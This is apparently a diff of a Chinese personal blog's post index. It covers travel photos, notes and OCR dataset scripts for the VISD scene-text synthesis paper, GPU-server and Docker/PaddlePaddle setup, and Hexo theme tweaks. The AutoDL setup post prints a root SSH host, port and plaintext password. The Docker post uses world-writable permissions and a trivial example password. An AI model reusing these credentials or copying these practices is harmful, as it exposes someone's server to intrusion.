    7.2 FJNU

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    7.4 东街口、乌山、洪塘大桥

    jpg


    jpg


    jpg

    7.10 协和学院

    jpg

    7.12 FJUT

    jpg jpg jpg

    7.19-7.23 武汉

    png

    7.27 跟小迷糊逛 FJNU

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    7.29 永嘉天地

    jpg jpg jpg

    jpg


    jpg

    ]]>
    @@ -5295,7 +5295,7 @@ /posts/Paper-Verisimilar%20Image%20Synthesis%20for%20Accurate%20Detection%20and%20Recognition%20of%20Texts%20in%20Scenes/ - 资源

    正文

    提出了一个新的合成数据集的方式(数据集简称 VISD),在实验中表明其好使。

    1 Introduction

    研究了三种方法来应对 DNN 训练中的图像注释挑战。

    • 几何变换
    • 机器学习(GAN 等)
    • 图像合成

    创新点:

    • 语义连贯:通过将文本嵌入背景图像中语义敏感区域的图像合成

    • 视觉显著性:确定每个语义连贯区域内的嵌入位置

    • 设计了一个新颖的场景文本外观模型,通过自适应学习真实场景文本图像的特征来确定源文本的颜色和亮度。

    jpg

    所提出的场景文本图像合成技术:

    • 如左侧框所示,给定要嵌入背景图像中的背景图像和源文本,首先确定语义图和显著性图,然后将其组合以识别语义上合理和适合的文本嵌入位置。
    • 根据背景图像中嵌入位置周围的颜色、亮度和上下文结构,进一步自适应地确定源文本的颜色、明亮度和方向。
    • 右侧框中的图片显示了通过所提出的技术合成的场景文本图像。
    • Image Synthesis
    • Scene Text Detection
    • Scene Text Recognition

    3 Scene Text Image Synthesis

    所提出的场景文本图像合成技术:

    • 从两种类型的输入开始,包括“Background Images”和“Source Texts”

    • 给定背景图像,可以通过组合它们的“Semantic Maps“和”Saliency Maps”来确定文本嵌入的区域

      • “Semantic Maps” 可用作语义图像分割研究中的基本事实
      • “Saliency Maps”可以使用现有的显著性模型来确定
    • 可以根据确定的文本嵌入区域的颜色和亮度自适应地估计源文本的颜色和强度

    • 最后,“合成图像”是通过将渲染文本放置在计算出的嵌入位置来生成的。

    3.1 Semantic Coherence

    • 语义连贯(SC)是指文本应该嵌入背景图像中语义敏感区域的目标。例如,文本应该放在栅栏板上,而不是天空或羊头上,因为在真实场景中很少看到文本。因此,SC 有助于创建语义上更敏感的前景-背景配对,这对于通过使用合成图像来学习/训练的视觉表示以及对象检测和识别模型非常重要。

    jpg

    3.2 Saliency Guidance

    • 并非语义连贯的对象或图像区域内的每个位置都适合于场景文本嵌入。例如,更适合在黄色机器的表面上嵌入场景文本,而不是在两个相邻的表面上,需要某些机制来进一步确定语义相干对象或图像区域内的确切场景文本嵌入位置。

    • 我们利用人类视觉注意力和场景文本放置原理来确定场景文本的确切嵌入位置。为了吸引人类的注意力和眼球,场景文本通常被放置在同质区域周围,如路标,以创造良好的对比度和可见性。

    jpg

    • 适合于文本嵌入的位置可以通过以下方式来确定:对所计算的显著性图进行阈值处理。在我们实现的系统中,使用了全局阈值,该阈值通过计算的显著性图的平均值简单地估计显著性指导有助于将文本嵌入语义敏感区域内的正确位置。显著性引导的使用进一步有助于提高合成图像的逼真度以及检测和识别模型的学习视觉表示。

    3.3 Adaptive Text Appearance

    • 将合成图像应用于训练场景文本检测和识别模型时,有效控制源文本和背景图像之间的对比度对于合成图像的有用性非常重要。

    • 设计了一种自适应对比技术,根据源文本在真实场景中的样子来控制源文本的颜色和亮度。其思想是搜索场景文本图像块(在现有数据集中的大量场景文本注释中容易获得),其背景具有与所确定的背景区域相似的颜色和亮度。然后可以通过参考搜索到的场景文本图像块内的文本像素的颜色和亮度来确定源文本的颜色和明亮度。

    • 对于每个文本注释,首先通过使用所研究的文本注释周围的背景区域来构建 HoG(定向梯度直方图)特征 $H_b$。注释框内文本像素的颜色和亮度的平均值和标准偏差也在 Lab 颜色空间中确定,用 $(\mu_L,\sigma_L)$、$(\mu_a, \sigma_a)$ 和 $(\mu_b, \sigma_b)$ 表示。因此,背景 HoG $H_b$ 和大量场景文本补丁的文本颜色和亮度统计 $(\mu_L, \sigma_L)$、$(\mu_a, \sigma_a)$ 和 $(\mu_b, \sigma_b)$ 形成了一个配对列表,如下所示:

    $$P=\left{H_{b_1}:(\mu_{L_1}, \sigma_{L_1}, \mu_{a_1},\sigma_{b_1}),…H_{b_i}:(\mu_{L_i}, \sigma_{L_i}, \mu_{a_i}, \sigma_{a_i}, \mu_{b_i}),…\right}$$

    $H_b$ 将用作注释场景文本图像补丁的索引,$(\mu_L,\sigma_L)$、$(\mu_a,\sigma_a)$ 和 $(\mu_b,\sigma_b)$ 将用作设置源文本的颜色和亮度的指南。对于下图所示的每个确定的背景补丁(适用于文本嵌入),可以提取其 HoG 特征 $H_s$,从而可以基于 $H_s$ 和 $H_b$ 之间的相似性来确定具有最相似背景的场景文本图像补丁。

    可以通过取相应的 $(\mu_L,\mu_a,\mu_b) $ 加上 $(\sigma_L, \sigma_a, \sigma_b)$ 周围的随机变化来确定源文本的颜色和亮度。

    jpg

    4 Implementations

    4.1 Scene Text Detection

    用 EAST 做测试模型。

    4.2 Scene Text Recognition

    使用 CRNN 模型来训练所有场景文本识别模型。

    5 Experiments

    5.1 Datasets and Evaluation Metrics

    使用的评估数据集:

    • ICDAR 2013
    • ICDAR 2015
    • MSRA-TD500
    • IIIT5K
    • SVT

    5.2 Scene Text Detection

    jpg

    这把消融实验和对比实验全放一起了。

    5.3 Scene Text Recognition

    jpg

    6 Conclusions

    好使。未来研究方向:进一步改进源文本的外观。

    7 Acknowledgement

    项目资助。

    数据集可视化

    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 987

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'

    image_path = os.path.join(image_dir, '1image_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, '1image_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    转换成 MindOCR 可读取的格式

    import os
    import numpy as np

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'
    save_dir = r'D:\dataset\VISD\10K\\'
    save_file = "train_det_gt.txt"

    string = ""

    for label_file in os.listdir(label_dir):
    print('------', label_file, '------')

    index = int(label_file.split('_')[1].split('.')[0])

    image_file = label_file.split('.')[0] + '.jpg'
    label_path = os.path.join(label_dir, label_file)

    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    string += image_file
    string += "\t["

    for i, annotation in enumerate(annotations):
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    string += '{"transcription": "'
    string += transcriptions
    string += '", "points": ['
    for j, point in enumerate(points):
    string += "["
    string += str(point[0])
    string += ", "
    string += str(point[1])
    if j != len(points) - 1:
    string += "], "
    else:
    string += "]]}"
    if i != len(annotations) - 1:
    string += ", "
    string += ']\n'
    # print(string)

    with open(os.path.join(save_dir, save_file), 'w') as file:
    file.write(string)
    ]]>
    + 资源

    正文

    提出了一个新的合成数据集的方式(数据集简称 VISD),在实验中表明其好使。

    1 Introduction

    研究了三种方法来应对 DNN 训练中的图像注释挑战。

    • 几何变换
    • 机器学习(GAN 等)
    • 图像合成

    创新点:

    • 语义连贯:通过将文本嵌入背景图像中语义敏感区域的图像合成

    • 视觉显著性:确定每个语义连贯区域内的嵌入位置

    • 设计了一个新颖的场景文本外观模型,通过自适应学习真实场景文本图像的特征来确定源文本的颜色和亮度。

    jpg

    所提出的场景文本图像合成技术:

    • 如左侧框所示,给定要嵌入背景图像中的背景图像和源文本,首先确定语义图和显著性图,然后将其组合以识别语义上合理和适合的文本嵌入位置。
    • 根据背景图像中嵌入位置周围的颜色、亮度和上下文结构,进一步自适应地确定源文本的颜色、明亮度和方向。
    • 右侧框中的图片显示了通过所提出的技术合成的场景文本图像。
    • Image Synthesis
    • Scene Text Detection
    • Scene Text Recognition

    3 Scene Text Image Synthesis

    所提出的场景文本图像合成技术:

    • 从两种类型的输入开始,包括“Background Images”和“Source Texts”

    • 给定背景图像,可以通过组合它们的“Semantic Maps“和”Saliency Maps”来确定文本嵌入的区域

      • “Semantic Maps” 可用作语义图像分割研究中的基本事实
      • “Saliency Maps”可以使用现有的显著性模型来确定
    • 可以根据确定的文本嵌入区域的颜色和亮度自适应地估计源文本的颜色和强度

    • 最后,“合成图像”是通过将渲染文本放置在计算出的嵌入位置来生成的。

    3.1 Semantic Coherence

    • 语义连贯(SC)是指文本应该嵌入背景图像中语义敏感区域的目标。例如,文本应该放在栅栏板上,而不是天空或羊头上,因为在真实场景中很少看到文本。因此,SC 有助于创建语义上更敏感的前景-背景配对,这对于通过使用合成图像来学习/训练的视觉表示以及对象检测和识别模型非常重要。

    jpg

    3.2 Saliency Guidance

    • 并非语义连贯的对象或图像区域内的每个位置都适合于场景文本嵌入。例如,更适合在黄色机器的表面上嵌入场景文本,而不是在两个相邻的表面上,需要某些机制来进一步确定语义相干对象或图像区域内的确切场景文本嵌入位置。

    • 我们利用人类视觉注意力和场景文本放置原理来确定场景文本的确切嵌入位置。为了吸引人类的注意力和眼球,场景文本通常被放置在同质区域周围,如路标,以创造良好的对比度和可见性。

    jpg

    • 适合于文本嵌入的位置可以通过以下方式来确定:对所计算的显著性图进行阈值处理。在我们实现的系统中,使用了全局阈值,该阈值通过计算的显著性图的平均值简单地估计显著性指导有助于将文本嵌入语义敏感区域内的正确位置。显著性引导的使用进一步有助于提高合成图像的逼真度以及检测和识别模型的学习视觉表示。

    3.3 Adaptive Text Appearance

    • 将合成图像应用于训练场景文本检测和识别模型时,有效控制源文本和背景图像之间的对比度对于合成图像的有用性非常重要。

    • 设计了一种自适应对比技术,根据源文本在真实场景中的样子来控制源文本的颜色和亮度。其思想是搜索场景文本图像块(在现有数据集中的大量场景文本注释中容易获得),其背景具有与所确定的背景区域相似的颜色和亮度。然后可以通过参考搜索到的场景文本图像块内的文本像素的颜色和亮度来确定源文本的颜色和明亮度。

    • 对于每个文本注释,首先通过使用所研究的文本注释周围的背景区域来构建 HoG(定向梯度直方图)特征 $H_b$。注释框内文本像素的颜色和亮度的平均值和标准偏差也在 Lab 颜色空间中确定,用 $(\mu_L,\sigma_L)$、$(\mu_a, \sigma_a)$ 和 $(\mu_b, \sigma_b)$ 表示。因此,背景 HoG $H_b$ 和大量场景文本补丁的文本颜色和亮度统计 $(\mu_L, \sigma_L)$、$(\mu_a, \sigma_a)$ 和 $(\mu_b, \sigma_b)$ 形成了一个配对列表,如下所示:

    $$P=\left{H_{b_1}:(\mu_{L_1}, \sigma_{L_1}, \mu_{a_1},\sigma_{b_1}),…H_{b_i}:(\mu_{L_i}, \sigma_{L_i}, \mu_{a_i}, \sigma_{a_i}, \mu_{b_i}),…\right}$$

    $H_b$ 将用作注释场景文本图像补丁的索引,$(\mu_L,\sigma_L)$、$(\mu_a,\sigma_a)$ 和 $(\mu_b,\sigma_b)$ 将用作设置源文本的颜色和亮度的指南。对于下图所示的每个确定的背景补丁(适用于文本嵌入),可以提取其 HoG 特征 $H_s$,从而可以基于 $H_s$ 和 $H_b$ 之间的相似性来确定具有最相似背景的场景文本图像补丁。

    可以通过取相应的 $(\mu_L,\mu_a,\mu_b) $ 加上 $(\sigma_L, \sigma_a, \sigma_b)$ 周围的随机变化来确定源文本的颜色和亮度。

    jpg

    4 Implementations

    4.1 Scene Text Detection

    用 EAST 做测试模型。

    4.2 Scene Text Recognition

    使用 CRNN 模型来训练所有场景文本识别模型。

    5 Experiments

    5.1 Datasets and Evaluation Metrics

    使用的评估数据集:

    • ICDAR 2013
    • ICDAR 2015
    • MSRA-TD500
    • IIIT5K
    • SVT

    5.2 Scene Text Detection

    jpg

    这把消融实验和对比实验全放一起了。

    5.3 Scene Text Recognition

    jpg

    6 Conclusions

    好使。未来研究方向:进一步改进源文本的外观。

    7 Acknowledgement

    项目资助。

    数据集可视化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 987

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'

    image_path = os.path.join(image_dir, '1image_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, '1image_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    转换成 MindOCR 可读取的格式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import os
    import numpy as np

    image_dir = r'D:\dataset\VISD\10K\image\\'
    label_dir = r'D:\dataset\VISD\10K\text\\'
    save_dir = r'D:\dataset\VISD\10K\\'
    save_file = "train_det_gt.txt"

    string = ""

    for label_file in os.listdir(label_dir):
    print('------', label_file, '------')

    index = int(label_file.split('_')[1].split('.')[0])

    image_file = label_file.split('.')[0] + '.jpg'
    label_path = os.path.join(label_dir, label_file)

    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    string += image_file
    string += "\t["

    for i, annotation in enumerate(annotations):
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    string += '{"transcription": "'
    string += transcriptions
    string += '", "points": ['
    for j, point in enumerate(points):
    string += "["
    string += str(point[0])
    string += ", "
    string += str(point[1])
    if j != len(points) - 1:
    string += "], "
    else:
    string += "]]}"
    if i != len(annotations) - 1:
    string += ", "
    string += ']\n'
    # print(string)

    with open(os.path.join(save_dir, save_file), 'w') as file:
    file.write(string)
    ]]>
    @@ -5378,7 +5378,7 @@ /posts/Server-AutoDL/ - 部署

    登录 AutoDL 算力云 | 弹性、好用、省钱。租 GPU 就上 AutoDL

    启动钞能力!

    png

    选一个差不多合适的显卡,就是你了 RTX 2080 Ti!

    png

    根据 Pay20Y/SEED (github.com) 里显示,他用的是 1.1.0 的 Pytorch,那就选 1.1.0 的 Pytoch(这也是为啥选 2080 Ti 的原因,3080 跑不了这么旧的 Pytorch):

    png

    设置好后,无卡模式开机:

    png

    获得 SSH 密钥:

    png

    记下登录指令和密码:

    ssh -p 44211 root@region-41.seetacloud.com
    Ae9NaYeuvd

    在 MobaXterm 里这么输入:

    • Remote host *:@region-41.seetacloud.com
    • Specify username:root
    • Port:44211

    png

    进去以后输入对应的用户名 root 和密码 Ae9NaYeuvd,就进去了:

    png

    看它的目录说明里写着把数据放在 autodl-tmp/ 里速度比较快,代码放 / 就行。

    搭建 SEED 的环境

    ayumiymk/aster.pytorch: ASTER in Pytorch (github.com)Pay20Y/SEED (github.com) 仓库里的东东下载到本地,然后传到服务器:

    png

    开始装环境:

    cd SEED-master
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    装完接着跑:

    pip install Cython
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    发现是安装 PyYAML 的时候报错的,单独安装它:

    pip install pyyaml

    然后在 requirements.txt 里把 PyYAML==5.1.2 给我删了。

    png

    我继续跑:

    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    叫我移除对 Scipy 版本的指定:

    png

    我继续跑:

    pip install -r requirements.txt

    Successfully!

    png

    接下来按照 ayumiymk/aster.pytorch: ASTER in Pytorch (github.com) 里的 README.md 下载好 Pretrained model 和 Data for training and testing,最后开跑!

    png

    用完记得关机,不然把你钱钱扣光光。

    要用 GPU 的时候记得不要选无卡模式。

    如果还有错,就去请教最牛逼的**伟哥**!

    png

    ]]>
    + 部署

    登录 AutoDL 算力云 | 弹性、好用、省钱。租 GPU 就上 AutoDL

    启动钞能力!

    png

    选一个差不多合适的显卡,就是你了 RTX 2080 Ti!

    png

    根据 Pay20Y/SEED (github.com) 里显示,他用的是 1.1.0 的 Pytorch,那就选 1.1.0 的 Pytoch(这也是为啥选 2080 Ti 的原因,3080 跑不了这么旧的 Pytorch):

    png

    设置好后,无卡模式开机:

    png

    获得 SSH 密钥:

    png

    记下登录指令和密码:

    1
    2
    ssh -p 44211 root@region-41.seetacloud.com
    Ae9NaYeuvd

    在 MobaXterm 里这么输入:

    • Remote host *:@region-41.seetacloud.com
    • Specify username:root
    • Port:44211

    png

    进去以后输入对应的用户名 root 和密码 Ae9NaYeuvd,就进去了:

    png

    看它的目录说明里写着把数据放在 autodl-tmp/ 里速度比较快,代码放 / 就行。

    搭建 SEED 的环境

    ayumiymk/aster.pytorch: ASTER in Pytorch (github.com)Pay20Y/SEED (github.com) 仓库里的东东下载到本地,然后传到服务器:

    png

    开始装环境:

    1
    2
    cd SEED-master
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    装完接着跑:

    1
    2
    pip install Cython
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    发现是安装 PyYAML 的时候报错的,单独安装它:

    1
    pip install pyyaml

    然后在 requirements.txt 里把 PyYAML==5.1.2 给我删了。

    png

    我继续跑:

    1
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    叫我移除对 Scipy 版本的指定:

    png

    我继续跑:

    1
    pip install -r requirements.txt

    Successfully!

    png

    接下来按照 ayumiymk/aster.pytorch: ASTER in Pytorch (github.com) 里的 README.md 下载好 Pretrained model 和 Data for training and testing,最后开跑!

    png

    用完记得关机,不然把你钱钱扣光光。

    要用 GPU 的时候记得不要选无卡模式。

    如果还有错,就去请教最牛逼的**伟哥**!

    png

    ]]>
    @@ -5405,7 +5405,7 @@ /posts/Paper-BlenderText-%E6%97%A7/ -
    ]]>
    +
    ]]>
    @@ -5434,7 +5434,7 @@ /posts/Hexo-%E7%BB%A7%E7%BB%AD%E4%BC%98%E5%8C%96%20hexo%20%E4%B8%BB%E9%A2%98/ - 正文

    修改 default_cover

    ​ 主题中的 default_cover 寄了很久了,才发现……

    https://tuapi.eees.cc/api.php?type=302&category=fengjing 还能用,可以返回一张随机的风景图片。

    png

    清理 topo

    ​ 仔细检查了下网页发现 topo 类没有什么作用,还占用响应时间,删了。

    png

    ​ 对应的样式也删了。

    png

    修改 categories-class-card

    ​ 在 _config.yml 中添加属性:

    categories_cover: https://tuapi.eees.cc/api.php?type=302&category=fengjing

    ​ 在 categories.ejs 里将 theme.default_cover 改为 theme.categories_cover

    png

    GitTalk

    ​ 自己的评论系统失效半年了……好多文章无法使用 GitTalk:

    png

    ​ 上网查了下解决方案:个人博客评论插件之 gittalk - 掘金 (juejin.cn)

    png

    ​ 解决方法居然是用自己的账号 @GZ-Metal-Cell,点击 使用 GitHub 登录 就可以了吗?就这么简单的问题居然卡了大半年一直没去修……

    ​ 没创建过的文章都点一遍,评论系统就可以用了,那好像还挺机车唉。

    ​ 之后 Github 就会自动帮你创建 Issues,要关闭评论的话应该进去把对应的 Issues 删了就行了吧:

    png

    ​ 但是这个评论系统,一般不科学上网是进不去的(好吧,我不知道 github.io 什么时候在福建会被封,毕竟在冀不翻墙是进不去的)

    Tinypng API

    ​ 这个功能还蛮有用的,尝试整个 API 用 Python 帮我批量压缩图片。

    ​ 登录 TinyPNG – 开发者 API (tinify.cn),管理 账号信息

    png

    ​ 申领一个 API:

    png

    ​ 使用教程:TinyPNG – API Reference (tinify.cn)

    ​ 我试一下:

    pip install --upgrade tinify
    import tinify

    tinify.key = "XXX"

    source = tinify.from_file("Test.jpg")
    source.to_file("Test_optimized.jpg")

    ​ OK,能使。

    png

    随机图片 API

    ​ 这个 https://tuapi.eees.cc/api.php?type=302&category=fengjing 还挺好玩,每次点进去都会返回出随机的图片,但是响应时间好像挺随机的,想想能不能搞一个属于自己的:

    ​ 使用:

    • PicGo 图床软件

    • JSdelivr 是一个免费的开源 CDN(Content Delivery Network)服务提供商。CDN 是一种将静态文件分发到全球多个服务器节点,以便更快地向用户提供内容的技术。比如

      …/…/…/…/2023/07/23/Diary-%E9%84%82%E4%BA%86%EF%BC%88%E4%BA%94%EF%BC%89/HY_8.jpg

      的响应速度就可能比

      https://cdn.jsdelivr.net/gh/GZ-Metal-Cell/GZ-Metal-Cell.github.io/2023/07/23/Diary-鄂了(五)/HY_8.jpg

      要慢。(格式为 https://cdn.jsdelivr.net/gh/用户名/仓库名/文件名.jpg/png

    • linux 下下面这个命令可以测试网址的响应时间:

    curl -o /dev/null -s -w "time_connect: %{time_connect}\ntime_starttransfer: %{time_starttransfer}\ntime_total: %{time_total}\n" "https://tuapi.eees.cc/api.php?type=302&category=fengjing"

    ​ 整一个 Github 仓库用于存放图片:

    png

    访客统计


    ]]>
    + 正文

    修改 default_cover

    ​ 主题中的 default_cover 寄了很久了,才发现……

    https://tuapi.eees.cc/api.php?type=302&category=fengjing 还能用,可以返回一张随机的风景图片。

    png

    清理 topo

    ​ 仔细检查了下网页发现 topo 类没有什么作用,还占用响应时间,删了。

    png

    ​ 对应的样式也删了。

    png

    修改 categories-class-card

    ​ 在 _config.yml 中添加属性:

    1
    categories_cover: https://tuapi.eees.cc/api.php?type=302&category=fengjing

    ​ 在 categories.ejs 里将 theme.default_cover 改为 theme.categories_cover

    png

    GitTalk

    ​ 自己的评论系统失效半年了……好多文章无法使用 GitTalk:

    png

    ​ 上网查了下解决方案:个人博客评论插件之 gittalk - 掘金 (juejin.cn)

    png

    ​ 解决方法居然是用自己的账号 @GZ-Metal-Cell,点击 使用 GitHub 登录 就可以了吗?就这么简单的问题居然卡了大半年一直没去修……

    ​ 没创建过的文章都点一遍,评论系统就可以用了,那好像还挺机车唉。

    ​ 之后 Github 就会自动帮你创建 Issues,要关闭评论的话应该进去把对应的 Issues 删了就行了吧:

    png

    ​ 但是这个评论系统,一般不科学上网是进不去的(好吧,我不知道 github.io 什么时候在福建会被封,毕竟在冀不翻墙是进不去的)

    Tinypng API

    ​ 这个功能还蛮有用的,尝试整个 API 用 Python 帮我批量压缩图片。

    ​ 登录 TinyPNG – 开发者 API (tinify.cn),管理 账号信息

    png

    ​ 申领一个 API:

    png

    ​ 使用教程:TinyPNG – API Reference (tinify.cn)

    ​ 我试一下:

    1
    pip install --upgrade tinify
    1
    2
    3
    4
    5
    6
    import tinify

    tinify.key = "XXX"

    source = tinify.from_file("Test.jpg")
    source.to_file("Test_optimized.jpg")

    ​ OK,能使。

    png

    随机图片 API

    ​ 这个 https://tuapi.eees.cc/api.php?type=302&category=fengjing 还挺好玩,每次点进去都会返回出随机的图片,但是响应时间好像挺随机的,想想能不能搞一个属于自己的:

    ​ 使用:

    • PicGo 图床软件

    • JSdelivr 是一个免费的开源 CDN(Content Delivery Network)服务提供商。CDN 是一种将静态文件分发到全球多个服务器节点,以便更快地向用户提供内容的技术。比如

      …//Diary-%E9%84%82%E4%BA%86%EF%BC%88%E4%BA%94%EF%BC%89/HY_8.jpg

      的响应速度就可能比

      https://cdn.jsdelivr.net/gh/GZ-Metal-Cell/GZ-Metal-Cell.github.io/2023/07/23/Diary-鄂了(五)/HY_8.jpg

      要慢。(格式为 https://cdn.jsdelivr.net/gh/用户名/仓库名/文件名.jpg/png

    • linux 下下面这个命令可以测试网址的响应时间:

    1
    curl -o /dev/null -s -w "time_connect: %{time_connect}\ntime_starttransfer: %{time_starttransfer}\ntime_total: %{time_total}\n" "https://tuapi.eees.cc/api.php?type=302&category=fengjing"

    ​ 整一个 Github 仓库用于存放图片:

    png

    访客统计


    ]]>
    @@ -5459,7 +5459,7 @@ /posts/Software-Docker/ - 资源

    部署(Windows11 + Wsl2)

    ​ Docker 默认安装在 C 盘并且不可控,在安装前尝试将 Docker 迁移至 D 盘:

    ​ 新建文件夹:C:\Program Files\Docker D:\Program Files\Docker

    ​ 使用管理员权限的 cmd:

    png

    mklink /j "C:\Program Files\Docker" "D:\Program Files\Docker"
    为 C:\Program Files\Docker <<===>> D:\Program Files\Docker 创建的联接

    ​ 从 Docker: Accelerated Container Application Development 整一个 Windows 版本的 Docker。安装之。

    ​ 进设置,把 Resources -> Advanced 里的 Disk image location 移到 D 盘:

    png

    ​ 在 Docker Engine 里,添加 "registry-mirrors": ["https://registry.docker-cn.com", "https://docker.mirrors.ustc.edu.cn"] 以获得镜像加速。

    png

    使用(paddleCPU)

    获取镜像

    ​ 获取镜像,让它下载,等:

    docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1

    ​ 可以从 paddlepaddle/paddle - Docker Image | Docker Hub 获取更多镜像。

    ​ 等它下载完:

    What's Next?
    View summary of image vulnerabilities and recommendations → docker scout quickview registry.baidubce.com/paddlepaddle/paddle:2.5.1

    png

    创建容器

    docker run --name paddle_docker -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1 /bin/bash
    • --name paddle_docker:设定 Docker 的名称,paddle_docker 是自己设置的名称;
    • -it:参数说明容器已和本机交互式运行;
    • -v $PWD:/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1:指定需要使用的 image 名称,您可以通过docker images命令查看;/bin/bash 是在 Docker 中要执行的命令

    png

    ​ 检查是否可用:

    import paddle
    paddle.utils.run_check()

    png

    关闭容器

    exit

    第二次使用

    启动:

    docker start paddle_docker

    进入:

    docker attach paddle_docker

    png

    使用(paddleCPU + jupyter)

    获取镜像

    ​ 案例,拉取 Paddle 镜像(由于 Windows 不可以使用 Nvidia-docker,所以只能装 CPU 版本的),在 powershell 里运行(但是在 Ubuntu 下的子系统居然都可以运行,居然是相通的?):

    docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter

    创建容器

    ​ 装好后,创建容器:

    docker run --name paddle_docker_jupyter -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter /bin/bash
    • --name paddle_docker-jupyter:设定 Docker 的名称,paddle_docker 是自己设置的名称;
    • -it:参数说明容器已和本机交互式运行;
    • -v $PWD:/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter:指定需要使用的 image 名称,您可以通过docker images命令查看;/bin/bash 是在 Docker 中要执行的命令。

    使用容器

    mkdir ./jupyter_docker
    chmod 777 ./jupyter_docker
    cd ./jupyter_docker
    docker run -p 80:80 --rm --env USER_PASSWD="123" -v $PWD:/home/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter
    • --rm:关闭容器后删除容器;
    • --env USER_PASSWD="123":为 jupyter 设置登录密码,123 是自己设置的密码;
    • -v $PWD:/home/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /home/paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1-jupyter:指定需要使用的 image 名称,您可以通过 docker images 命令查看

    png

